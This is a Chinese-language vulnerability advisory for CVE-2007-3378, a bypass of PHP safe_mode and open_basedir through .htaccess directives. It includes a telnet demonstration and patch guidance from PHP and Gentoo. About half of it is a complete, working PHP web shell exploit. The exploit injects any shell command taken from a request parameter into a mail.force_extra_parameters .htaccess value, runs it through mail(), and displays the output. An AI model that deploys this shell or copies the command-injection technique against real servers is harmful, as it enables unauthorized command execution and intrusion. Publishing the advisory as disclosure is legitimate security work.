安全研究
安全漏洞
PHP .htaccess绕过Safe_Mode和Open_Basedir安全限制漏洞
发布日期:2007-06-27
更新日期:2007-08-31
受影响系统:
PHP PHP 5.2.3不受影响系统:
PHP PHP 4.4.7
PHP PHP 5.2.4描述:
BUGTRAQ ID: 24661,25498
CVE(CAN) ID: CVE-2007-3378
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP在处理.htaccess文件中的配置时存在漏洞,本地攻击者可能利用此漏洞绕过PHP的某些安全限制。
如果将PHP用作Apache模块的话,就可以使用.htaccess文件中的指令更改配置设置。用户可以使用这些选项更改display_errors之类权限选项,但可以绕过不同函数中的safe_mode或open_basedir安全限制。例如,用户可以通过.htaccess设置session.save_path。在session_save_path()和ini_set()函数中对save_path检查了safe_mode和open_basedir,但在.htaccess中确可以绕过这个检查。
示例:
cxib# ls -la /www/cxib/
total 14
drwxr-xr-x 3 cxib www 512 Feb 16 20:20 .
drwxr-xr-x 11 www www 7168 Feb 16 20:07 ..
- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php
<?php
session_save_path("/inne");
session_start();
?>
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html
<br />
<b>Warning</b>: session_save_path() [<a
href='function.session-save-path'>function.session-save-path&l
t;/a>]:
open_basedir restriction in effect. File(/inne) is not within the
allowed
path(s): (/www) in <b>/www/cxib/stars.php</b> on line
<b>2</b><br />
<br />
<b>Warning</b>: session_start() [<a
href='function.session-start'>function.session-start</a>
]: open_basedir
restriction in effect. File(/var/tmp/) is not within the allowed
path(s):
(/www) in <b>/www/cxib/stars.php</b> on line
<b>3</b><br />
<br />
<b>Fatal error</b>: session_start() [<a
href='function.session-start'>function.session-start&l
t;/a>]: Failed to
initialize storage module: files (path: ) in
<b>/www/cxib/stars.php</b> on
line <b>3</b><br />
Connection closed by foreign host.
cxib#
因此用户无法在目录中创建会话,但可以创建.htaccess文件,因此可以在此写入:
- ---
php_value session.save_path /inne
- ---
cxib# ls -la /www/cxib/
total 16
drwxr-xr-x 3 cxib www 512 Feb 16 20:26 .
drwxr-xr-x 11 www www 7168 Feb 16 20:26 ..
- -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess
- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php
<?php
session_start();
?>
无法通过ini_set()或session_save_path()设置session.save_path,但发送以下请求:
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Connection closed by foreign host.
cxib#
cxib# ls -la /inne
total 3
drwxrwxrwx 2 root wheel 512 Feb 16 20:30 .
drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 ..
- -rw------- 1 www wheel 0 Feb 16 20:30
sess_45cae9284f2f8b7cb05ce96021c9bf4e
这样就绕过了Open_basedir和safe_mode限制。error_log和其他一些函数中也存在同样的问题。
<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
链接:http://securityreason.com/achievement_securityalert/45
http://secunia.com/advisories/26642/
http://www.php.net/releases/5_2_4.php
http://secunia.com/advisories/28318/
http://security.gentoo.org/glsa/glsa-200710-02.xml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
#
# Advisory : http://securityreason.com/achievement_securityalert/45
# Orginal Exploit : http://securityreason.com/achievement_exploitalert/9
#
# SecurityAlert : 45
# CVE : CVE-2007-3378
# SecurityRisk : High
# Remote Exploit : No
# Local Exploit : Yes
# Affected Software : PHP 5.2.3 and prior
#
# This exploit bypass safe_mode , open_basedir and disbale functions .
# First it creates crafted .htaccess file and then all executed commands are written to result.txt file using mail(); function.
# Usage :
# ?cxib=dhr - Delete Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#
#variables
$htaccess="./.htaccess";
#variables
if(@mail("", "", "")==FALSE){
die("mail() function isn't active.");
}
if(!is_writable("./")){
die("This directory isn't writable.");
}
if($_GET['cxib']=="dhr"){
@unlink("./.htaccess");
@unlink("./result.txt");
}
$usun="";
if(file_exists("./result.txt") AND file_exists("./.htaccess")){
$usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"].
$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>";
}
$htmlstart="<HTML>
<HEAD>
<TITLE>SecurityReason Exploit - PHP 5.2.3 and
prior</TITLE>
</HEAD>
<BODY>";
$formtxt="<center><h1>Security<b><font
color=RED>R</font>eason</b></h1><p>Exploit for PHP 5.2.3 and
prior</p><B><CENTER><FONT
COLOR=\"RED\">C</FONT>oded by <b>Maksymilian Arciemowicz</b>
".$usun."
<p>Form:<br>
<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\"
name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\" value=\"Exec\">
</form>
</CENTER></B>";
$htmlend="</BODY>
</HTML>";
$path=dirname($_SERVER["SCRIPT_NAME"]);
if(empty($sh)){
if(empty($_GET['sh'])){
if(empty($_POST['sh'])){
echo $htmlstart.$formtxt;
if(file_exists("./result.txt")){
echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"].
$path."/result.txt\" height=300 width=1000></center>";
}
echo $htmlend;
exit();
} else {
$sh=$_POST['sh'];
}
} else {
$sh=$_GET['sh'];
}
}
if (!$handle = @fopen($htaccess, 'w')) {
echo "Cannot create ".$htaccess."<B>check your rights to this directory.<P>. exit();";
exit;
}
$syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";
if (fwrite($handle, $syntax) === FALSE) {
echo "Cannot write to file (".$htaccess.")";
exit;
}
if(!empty($_POST['sent'])){
@mail("", "", "Yeah");
sleep(2);
header("Location: http://".$_SERVER["HTTP_HOST"].
$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
exit();
}
?>
建议:
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.php.net/get/php-5.2.4.tar.gz/from/a/mirror
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200710-02)以及相应补丁:
GLSA-200710-02:PHP: Multiple vulnerabilities
链接:http://security.gentoo.org/glsa/glsa-200710-02.xml
所有PHP用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.2.4_p20070914-r2"
浏览次数:5968
严重程度:0(网友投票)
绿盟科技给您安全的保障